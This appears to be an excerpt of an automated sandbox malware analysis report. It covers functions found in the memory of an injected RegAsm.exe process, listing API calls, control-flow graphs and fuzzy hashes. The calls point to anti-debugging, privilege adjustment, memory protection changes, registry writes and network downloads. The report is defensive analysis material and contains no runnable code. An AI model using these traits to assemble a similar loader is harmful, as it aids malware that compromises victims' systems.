                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00F02A91, Relevance: 3.1, APIs: 2, Instructions: 106sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1675 f02a91-f02aa2 1676 f02aa5-f02aad 1675->1676 1676->1676 1677 f02aaf-f02b00 GetPEB call f09eee 1676->1677 1680 f02b06-f02b38 call f09eee Sleep 1677->1680 1681 f02a7c-f02a8a 1677->1681 1687 f02f6b-f02f82 TerminateThread 1680->1687 1688 f02b3e-f02b45 1680->1688 1682 f0a80b 1681->1682 1684 f0a810 1682->1684 1685 f0a80b call f02a91 1682->1685 1689 f0a815 1684->1689 1685->1684 1690 f04bb7 call f02b4a 1687->1690 1688->1690 1689->1689 1692 f04bbc-f04bcc call f08fc5 call f045aa 1690->1692 1697 f04bdb-f04c26 call f045aa 1692->1697 1698 f04bce-f04bd3 1692->1698 1697->1682 1697->1692 1698->1692
                                  APIs
                                  • Sleep.KERNEL32(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_0000A810,00000000,00000000,00000000), ref: 00F02B2E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: cb8104912665ef0133ece89a500bfd49e73c1bea20618522217c05156157e0d2
                                  • Instruction ID: ff4b9686de0e36174efe990d10fbca71da5eaae0867dd9c4588638afa4014297
                                  • Opcode Fuzzy Hash: cb8104912665ef0133ece89a500bfd49e73c1bea20618522217c05156157e0d2
                                  • Instruction Fuzzy Hash: 2A3101B0604301AFEB246E24CD4DBE873A2BF017A4F544248EE519B0D2DBB4D880EA11
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE1E1E, Relevance: 2.8, Strings: 2, Instructions: 324UNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1725 1fee1e1e-1fee1e4a 1727 1fee2386-1fee239f 1725->1727 1728 1fee1e50-1fee1e57 1725->1728 1733 1fee2217 1727->1733 1734 1fee23a5 1727->1734 1729 1fee21ad-1fee21b3 1728->1729 1731 1fee21bc 1729->1731 1732 1fee21b5 1729->1732 1743 1fee215c-1fee218a call 1fee0ca0 1731->1743 1732->1731 1735 1fee218c 1732->1735 1736 1fee20aa-1fee20ae 1732->1736 1737 1fee23aa-1fee23b3 1732->1737 1738 1fee20e9-1fee20f7 1732->1738 1739 1fee2004-1fee204d 1732->1739 1740 1fee23c0-1fee2416 1732->1740 1741 1fee223e 1732->1741 1742 1fee21be-1fee21cf 1732->1742 1732->1743 1744 1fee20fc 1732->1744 1745 1fee23bb 1732->1745 1746 1fee1e9b-1fee1eb4 1732->1746 1747 1fee2197-1fee21a8 1732->1747 1815 1fee221e call 1fee3da8 1733->1815 1816 1fee221e call 1fee3da3 1733->1816 1819 1fee218c call 1fee42ab 1735->1819 1820 1fee218c call 1fee42b8 1735->1820 1750 1fee241d-1fee242c 1736->1750 1751 1fee20b4-1fee20e4 1736->1751 1737->1745 1738->1744 1739->1736 1797 1fee204f-1fee2087 1739->1797 1740->1750 1817 1fee2245 call 1fee384b 1741->1817 1818 1fee2245 call 1fee3850 1741->1818 1742->1733 1743->1729 1811 1fee2103 call 1db40606 1744->1811 1812 1fee2103 call 1db405df 1744->1812 1813 1fee2103 call 1fee2c33 1744->1813 1814 1fee2103 call 1fee2c40 1744->1814 1749 1fee2501-1fee2505 1745->1749 1765 1fee1f2b-1fee1f38 call 1fee0a68 1746->1765 1766 1fee1eb6-1fee1ee1 1746->1766 1747->1729 1760 1fee250c-1fee2513 1749->1760 1761 1fee2507 1749->1761 1750->1749 1751->1729 1754 1fee2192 1754->1747 1761->1760 1762 1fee2109-1fee210b 1769 1fee210d-1fee2125 1762->1769 1770 1fee212a-1fee215a 1762->1770 1763 1fee2224-1fee2236 1771 1fee1e5c-1fee1e81 1763->1771 1772 1fee223c 1763->1772 1764 1fee224b 1781 1fee2257-1fee226b 1764->1781 1785 1fee1f3d-1fee1f60 1765->1785 1776 1fee1ef6-1fee1f08 1766->1776 1777 1fee1ee3-1fee1ef1 1766->1777 1769->1729 1770->1729 1774 1fee1e8f-1fee1e96 1771->1774 1775 1fee1e83-1fee1e8a 1771->1775 1786 1fee220e-1fee2215 1772->1786 1787 1fee21e4-1fee21fa 1772->1787 1774->1729 1775->1729 1782 1fee1f1f-1fee1f26 1776->1782 1783 1fee1f0a-1fee1f1a 1776->1783 1777->1729 1790 1fee2275-1fee228a 1781->1790 1782->1729 1783->1729 1785->1742 1793 1fee1f66-1fee1f78 1785->1793 1786->1729 1794 1fee21fc-1fee2203 1787->1794 1795 1fee2205-1fee220c 1787->1795 1790->1727 1801 1fee1f7a-1fee1f8f 1793->1801 1802 1fee1f94-1fee1fad 1793->1802 1794->1729 1795->1729 1805 1fee2089-1fee2090 1797->1805 1806 1fee2095-1fee20a5 1797->1806 1801->1729 1807 1fee1faf-1fee1fcc 1802->1807 1808 1fee1fec-1fee1fff 1802->1808 1805->1729 1806->1729 1809 1fee1fce-1fee1fdb 1807->1809 1810 1fee1fe0-1fee1fe7 1807->1810 1808->1729 1809->1729 1810->1729 1811->1762 1812->1762 1813->1762 1814->1762 1815->1763 1816->1763 1817->1764 1818->1764 1819->1754 1820->1754
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: +$^7
                                  • API String ID: 0-4122397898
                                  • Opcode ID: d139511b3c7a85fdccb8993fb85b391b2a713777d4256932a2e5b12485ed7cbb
                                  • Instruction ID: ede169dc9619c7640135b743b03d3795acaacb2ba50d461f7b177e4ffaf0aebb
                                  • Opcode Fuzzy Hash: d139511b3c7a85fdccb8993fb85b391b2a713777d4256932a2e5b12485ed7cbb
                                  • Instruction Fuzzy Hash: 1EE15FB0D00219CFEB14CFA8E99479DBBB2FF84354F208229E416AB396D775A945CF11
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 204F2A5B, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                  Download Yara Rule
                                  APIs
                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 204F2ADB
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: AdjustPrivilegesToken
                                  • String ID:
                                  • API String ID: 2874748243-0
                                  • Opcode ID: bb42e42a53dfca5094beef99908e408b1d8ab597f3182577064dcb31458deb7d
                                  • Instruction ID: 29b691a787cf08ce38b5f1a02350ef07e557fcb4bd97e131887ed07332cb02e7
                                  • Opcode Fuzzy Hash: bb42e42a53dfca5094beef99908e408b1d8ab597f3182577064dcb31458deb7d
                                  • Instruction Fuzzy Hash: E021AE76509784AFDB128F65DC44B52BFB4EF06310F0884DAED858B263D375E918CBA2
                                  Uniqueness

                                  Uniqueness Score: 0.18%

                                  Function 204F2C97, Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtQuerySystemInformation.NTDLL ref: 204F2D0D
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: InformationQuerySystem
                                  • String ID:
                                  • API String ID: 3562636166-0
                                  • Opcode ID: ef743420c98d905ddf9180b47d33a44eab3fb6e2b290532216873debf0d2ba71
                                  • Instruction ID: 4ae86b3853a2899bb06e79352c26c1d01a203b80d44b8c9d56ec23e74d5ec2ad
                                  • Opcode Fuzzy Hash: ef743420c98d905ddf9180b47d33a44eab3fb6e2b290532216873debf0d2ba71
                                  • Instruction Fuzzy Hash: 83219D754097C4AFD7128B20DC45A52FFB0EF17214F0984CBED848B1A3D2699A19DB62
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 204F2A92, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                  Download Yara Rule
                                  APIs
                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 204F2ADB
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: AdjustPrivilegesToken
                                  • String ID:
                                  • API String ID: 2874748243-0
                                  • Opcode ID: a93428845387b635967f6f3ada0f32a0c43506b78d5f27ab44f7614fe49641b4
                                  • Instruction ID: 420ed5a67dfff93129594929bd6400b67a388f0ad44a823c96b03687717e9adb
                                  • Opcode Fuzzy Hash: a93428845387b635967f6f3ada0f32a0c43506b78d5f27ab44f7614fe49641b4
                                  • Instruction Fuzzy Hash: 3111A0356003449FDB20CF95D988B56FBE4EF04220F08C4AADD498B652D779E918DFA2
                                  Uniqueness

                                  Uniqueness Score: 0.18%

                                  Function 204F2CD2, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtQuerySystemInformation.NTDLL ref: 204F2D0D
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: InformationQuerySystem
                                  • String ID:
                                  • API String ID: 3562636166-0
                                  • Opcode ID: 1f069f753299cbe68ed6896889a1ef4be9200b85a25bc6b642fe18a9296ef1ec
                                  • Instruction ID: 4fe4cc912dccf024f674e50bc5cd15fd180c4c0e71ca5b6ffe973128192c331c
                                  • Opcode Fuzzy Hash: 1f069f753299cbe68ed6896889a1ef4be9200b85a25bc6b642fe18a9296ef1ec
                                  • Instruction Fuzzy Hash: 0601AD355006449FEB20CF45D988B52FFA0EF44320F18C49ADD894B712C37AE918DFA2
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 00F09B4C, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00F09515,00000040,00F00A94,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F09B65
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                  • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                                  • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                  • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  Function 1FEE1850, Relevance: 5.2, Strings: 4, Instructions: 201UNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 198 1fee1850-1fee1856 200 1fee1857-1fee1884 198->200 202 1fee19df-1fee19e2 200->202 203 1fee195b-1fee19a4 202->203 204 1fee19e8 202->204 208 1fee19a6-1fee19b0 203->208 204->200 205 1fee19ef-1fee19f4 204->205 206 1fee1889-1fee1890 204->206 207 1fee1ac9-1fee1b06 204->207 204->208 209 1fee1a64-1fee1a97 204->209 210 1fee1902-1fee194f 204->210 211 1fee1a00-1fee1a0a 204->211 212 1fee1b20-1fee1b2c 204->212 213 1fee1bbe-1fee1bc2 204->213 214 1fee1a9f-1fee1ac3 204->214 215 1fee1899-1fee18eb 204->215 216 1fee19b7-1fee19ca 204->216 217 1fee1954 204->217 218 1fee1a53-1fee1a5d 204->218 219 1fee1bd1-1fee1beb 204->219 220 1fee18f1-1fee18fb 204->220 221 1fee1a11-1fee1a50 204->221 205->211 256 1fee1893 call 1fee1ccf 206->256 257 1fee1893 call 1db40606 206->257 258 1fee1893 call 1fee1cd8 206->258 259 1fee1893 call 1db405df 206->259 252 1fee1b08 207->252 253 1fee1b11 207->253 208->216 209->214 210->202 211->221 212->219 224 1fee1b32 212->224 222 1fee1bc9-1fee1bd0 213->222 223 1fee1bc4 213->223 214->207 214->213 215->205 215->220 260 1fee19cc call 1db40606 216->260 261 1fee19cc call 1db405df 216->261 217->203 218->209 220->210 221->218 223->222 224->200 224->205 224->206 224->207 224->208 224->209 224->210 224->211 224->212 224->213 224->214 224->215 224->216 224->217 224->218 224->219 224->220 224->221 237 1fee19d2-1fee19de 237->202 252->253 253->212 256->215 257->215 258->215 259->215 260->237 261->237
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: JJ$EV_V^$uV_V^$V_V^
                                  • API String ID: 0-2967845765
                                  • Opcode ID: ce512fe6a5d4d8dc32d0014a45f3ba01b0775d15d83fcdc3e713e635d2b324b5
                                  • Instruction ID: c6391741812328c3ecd9b0556eddf294eac491afe31ad50236bcda37aa8bd4f5
                                  • Opcode Fuzzy Hash: ce512fe6a5d4d8dc32d0014a45f3ba01b0775d15d83fcdc3e713e635d2b324b5
                                  • Instruction Fuzzy Hash: E98175B0A00204CFDB10EFB9C4946EDBBF2AB85304F508959D057AB391DB7AA945CF96
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00F052B9, Relevance: 3.1, APIs: 2, Instructions: 97networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1703 f052b9-f052d3 InternetOpenA 1704 f052d9-f0530a call f09eee 1703->1704 1705 f057fa-f0580a call f09eee 1703->1705 1704->1705 1710 f05310-f05336 InternetOpenUrlA 1704->1710 1710->1705 1711 f0533c-f05358 1710->1711 1712 f0535a-f05377 1711->1712 1713 f05385-f053a1 call f09eee 1712->1713 1714 f05379-f05381 1712->1714 1713->1705 1717 f053a7-f057a4 1713->1717 1714->1713 1719 f057b6-f057f5 call f09eee * 2 1717->1719 1720 f057a6-f057af 1717->1720 1720->1712
                                  APIs
                                  • InternetOpenA.WININET(00F05AC4,00000000,00000000,00000000,00000000,00F0124E,00000000,00000000,00000000,00000000,0000006D,0000020C,?,00F05A48,00000000,000000FF), ref: 00F052C9
                                  • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004,?,00000004,00000000,?,00000000), ref: 00F0532E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InternetOpen
                                  • String ID:
                                  • API String ID: 2038078732-0
                                  • Opcode ID: bc5163e42e9add266c6683ac9f16a41edb28294c7a844079115d7c557696cb88
                                  • Instruction ID: 820cde72d2ab3fb4074ef3521dbc317c3ba4fb1654814bf29179b312da00da35
                                  • Opcode Fuzzy Hash: bc5163e42e9add266c6683ac9f16a41edb28294c7a844079115d7c557696cb88
                                  • Instruction Fuzzy Hash: 7131613024438AEBEF358E64CD55BEE3666AF04740F508029FD4E9A1D1E7B19984FF20
                                  Uniqueness

                                  Uniqueness Score: 4.01%

                                  Function 1FEE2638, Relevance: 2.7, Strings: 2, Instructions: 171UNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1821 1fee2638-1fee264f 1822 1fee2652-1fee2664 1821->1822 1823 1fee271c-1fee2723 1822->1823 1824 1fee266a-1fee2682 1822->1824 1825 1fee276b-1fee2772 1823->1825 1826 1fee2725-1fee2764 1823->1826 1831 1fee2689-1fee269b 1824->1831 1828 1fee27a4-1fee27c9 1825->1828 1829 1fee2774-1fee279b 1825->1829 1826->1825 1838 1fee280b-1fee282c 1828->1838 1839 1fee27cb-1fee2806 1828->1839 1829->1828 1841 1fee26dd-1fee271a 1831->1841 1842 1fee269d-1fee26ac 1831->1842 1857 1fee282e-1fee2845 1838->1857 1858 1fee2886-1fee2893 1838->1858 1859 1fee28c4-1fee28cb 1839->1859 1843 1fee26ad-1fee26b0 1841->1843 1842->1843 1848 1fee26b9-1fee26d6 1843->1848 1849 1fee26b2 1843->1849 1848->1841 1849->1823 1849->1848 1865 1fee2847-1fee2859 1857->1865 1866 1fee2895-1fee28a6 1857->1866 1863 1fee28ab-1fee28bf 1858->1863 1863->1822 1863->1859 1870 1fee286d-1fee2876 1865->1870 1871 1fee285b-1fee286b 1865->1871 1866->1863 1870->1866 1872 1fee2878-1fee287b 1870->1872 1871->1858 1872->1858
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 5U_V^$T_V^
                                  • API String ID: 0-1992429273
                                  • Opcode ID: bee9347ee2fa5de8214e89284e6c930c9c0f26377a861ffb17b6aef32689411c
                                  • Instruction ID: b93b1080946594afe713e27d790d222513157da45afffbee66e37e96e5636c13
                                  • Opcode Fuzzy Hash: bee9347ee2fa5de8214e89284e6c930c9c0f26377a861ffb17b6aef32689411c
                                  • Instruction Fuzzy Hash: 0E61BF31B002108FD704EF38D9A479D37E2BBC5714F6589A8D0079F392DB76A946CB92
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 1FEE262B, Relevance: 2.6, Strings: 2, Instructions: 129UNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1878 1fee262b-1fee264f 1880 1fee2652-1fee2664 1878->1880 1881 1fee271c-1fee2723 1880->1881 1882 1fee266a 1880->1882 1883 1fee276b-1fee2772 1881->1883 1884 1fee2725-1fee2764 1881->1884 1885 1fee2674-1fee2682 1882->1885 1886 1fee27a4-1fee27c9 1883->1886 1887 1fee2774-1fee279b 1883->1887 1884->1883 1889 1fee2689-1fee269b 1885->1889 1896 1fee280b-1fee282c 1886->1896 1897 1fee27cb-1fee2806 1886->1897 1887->1886 1899 1fee26dd-1fee271a 1889->1899 1900 1fee269d-1fee26ac 1889->1900 1915 1fee282e-1fee2845 1896->1915 1916 1fee2886-1fee2893 1896->1916 1917 1fee28c4-1fee28cb 1897->1917 1901 1fee26ad-1fee26b0 1899->1901 1900->1901 1906 1fee26b9-1fee26d6 1901->1906 1907 1fee26b2 1901->1907 1906->1899 1907->1881 1907->1906 1923 1fee2847-1fee2859 1915->1923 1924 1fee2895-1fee28a6 1915->1924 1921 1fee28ab-1fee28bf 1916->1921 1921->1880 1921->1917 1928 1fee286d-1fee2876 1923->1928 1929 1fee285b-1fee286b 1923->1929 1924->1921 1928->1924 1930 1fee2878-1fee287b 1928->1930 1929->1916 1930->1916
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 5U_V^$T_V^
                                  • API String ID: 0-1992429273
                                  • Opcode ID: e013de02c33803ac0cbdb02898b77b9a2ed51601010130128044a542bb8cecab
                                  • Instruction ID: ebbe4e09f8a3dcf9383f18c16b49d26bb16692a0e00208406f5c9dc1829e8c5a
                                  • Opcode Fuzzy Hash: e013de02c33803ac0cbdb02898b77b9a2ed51601010130128044a542bb8cecab
                                  • Instruction Fuzzy Hash: F541EF71A002608FD704EF38C49576D7BB2AB86314F6585ACD40B9F382CB76EC46CB92
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00F017CE, Relevance: 1.9, APIs: 1, Instructions: 369registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1936 f017ce-f068cd RegCreateKeyExA call f01844 call f01820 1944 f068d0-f068e9 call f017ce 1936->1944 1945 f06943-f06946 1936->1945 1955 f06947 1944->1955 1956 f068eb-f068f6 1944->1956 1947 f06948-f0695b 1945->1947 1952 f0695d-f0696f 1947->1952 1954 f06d64-f06d76 call f051b5 1952->1954 1955->1947 1956->1952 1960 f068f8-f068fb 1956->1960 1963 f06971-f06d62 1960->1963 1964 f068fe-f06913 call f01d5a call f0186b 1960->1964 1963->1954 1970 f06918-f06940 1964->1970 1970->1945
                                  APIs
                                  • RegCreateKeyExA.KERNEL32(80000001,00F068D8,00000000,00000000,00000000,000F003F,00000000,?,?,00F01137,?,?,00000000,00000000,000000FF,00000007), ref: 00F017FE
                                    • Part of subcall function 00F01820: RegSetValueExA.KERNEL32(?,00F068C2,00000000,00000001,?,?,?,?,?,?,00F01137,?,?,00000000,00000000,000000FF), ref: 00F01831
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateValue
                                  • String ID:
                                  • API String ID: 2259555733-0
                                  • Opcode ID: d9f395971c2ca6145ebf6f93edd2d5dc9cf51339c3d344746328083a87b90d0b
                                  • Instruction ID: df3224735ee7695bd37039545709cca4ab766c42fb1b294b847f88a9515ba62f
                                  • Opcode Fuzzy Hash: d9f395971c2ca6145ebf6f93edd2d5dc9cf51339c3d344746328083a87b90d0b
                                  • Instruction Fuzzy Hash: 20C17AD3D1E5543FA2A18D29E9A23AEE6E117613007B8D2498E519FB8EF36CFC0153C1
                                  Uniqueness

                                  Uniqueness Score: 0.14%

                                  Function 00F09F12, Relevance: 1.8, APIs: 1, Instructions: 335filenativethreadUNIQUE
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00F00AC8
                                  • CreateFileW.KERNEL32(?,?,?,?,000000C0,?,?,00000000,?,00F004BD,00000000), ref: 00F0A7D8
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFileInformationThread
                                  • String ID:
                                  • API String ID: 2580995559-0
                                  • Opcode ID: 00133cc32faff595a26c4de06b7b911790b2ec6a7b4a7baf7a59f1db3d213b15
                                  • Instruction ID: 93f3d983b54c90a45d90d3c3588df8f13f782939a1eb41f3a165c06ca607a7be
                                  • Opcode Fuzzy Hash: 00133cc32faff595a26c4de06b7b911790b2ec6a7b4a7baf7a59f1db3d213b15
                                  • Instruction Fuzzy Hash: 11B1E693E1E5156FA6A49D2DE8D13AFA2E257A03107F8D1188E119F78DE3ACFC4253C1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00F0A30D, Relevance: 1.8, APIs: 1, Instructions: 329filenativethreadUNIQUE
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00F00AC8
                                  • CreateFileW.KERNEL32(?,?,?,?,000000C0,?,?,00000000,?,00F004BD,00000000), ref: 00F0A7D8
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFileInformationThread
                                  • String ID:
                                  • API String ID: 2580995559-0
                                  • Opcode ID: be58969baf69663eeee644a64fb9ef284b25a6643e8ecf1cff3a39de77eeaf43
                                  • Instruction ID: 5aa26fa036ad608adecce74571da29aa50c6d554b1c172716bed1ecb92adb548
                                  • Opcode Fuzzy Hash: be58969baf69663eeee644a64fb9ef284b25a6643e8ecf1cff3a39de77eeaf43
                                  • Instruction Fuzzy Hash: 2CB1E893E1E5156FA6A48D2DE8D13AFA2E257A03107F8D1188E119F78DE3ACFC4253C1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00F02B50, Relevance: 1.8, APIs: 1, Instructions: 275threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateThread.KERNEL32(000000FE,00000000), ref: 00F02F78
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: TerminateThread
                                  • String ID:
                                  • API String ID: 1852365436-0
                                  • Opcode ID: 6670c59fd34363fb74b30b30c27a4bf1a5391331b13fca0eaddc9fd4ae2d1e1f
                                  • Instruction ID: 588ba526f6859e4ed735627b89a88120e583cf20e1c4f6089979a1b07c4b1a50
                                  • Opcode Fuzzy Hash: 6670c59fd34363fb74b30b30c27a4bf1a5391331b13fca0eaddc9fd4ae2d1e1f
                                  • Instruction Fuzzy Hash: 32913393E5E5183F66A04C2DF8A67AEA2E243907007F4D2049F126F78DF3ACBC4206C0
                                  Uniqueness

                                  Uniqueness Score: 1.31%

                                  Function 1DB1A686, Relevance: 1.6, APIs: 1, Instructions: 97registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1DB1A731
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: eba814ec7f4b3e92fc02a618638aea8c89830aed828184392d121930831640f3
                                  • Instruction ID: e51fef598bcf34ee980d52231238bb77c4f911b710c97a9876bf649b0de857a9
                                  • Opcode Fuzzy Hash: eba814ec7f4b3e92fc02a618638aea8c89830aed828184392d121930831640f3
                                  • Instruction Fuzzy Hash: 8D31B0B10093806FE7128B649C84FA7FFB8EF06210F08859BE985DB193D224A909C761
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 1DB1BC1A, Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateDirectoryW.KERNEL32(?,?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 1DB1BCBF
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CreateDirectory
                                  • String ID:
                                  • API String ID: 4241100979-0
                                  • Opcode ID: 29408ef27eadf676ecd10efe29dbd220d22ea5ad1f5f99b447db4fa0db002479
                                  • Instruction ID: d0f5fc20d16eb3d436a5fa669e67462fd694254eff46821cc2738a9e1c1c6fa5
                                  • Opcode Fuzzy Hash: 29408ef27eadf676ecd10efe29dbd220d22ea5ad1f5f99b447db4fa0db002479
                                  • Instruction Fuzzy Hash: B931367150E3C19FD7038B759865A92BFB49F03220B0E84EBD885CF1A3D6689849CB72
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  Function 204F0CAF, Relevance: 1.6, APIs: 1, Instructions: 95networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WSASocketW.WS2_32(?,?,?,?,?), ref: 204F0D6A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
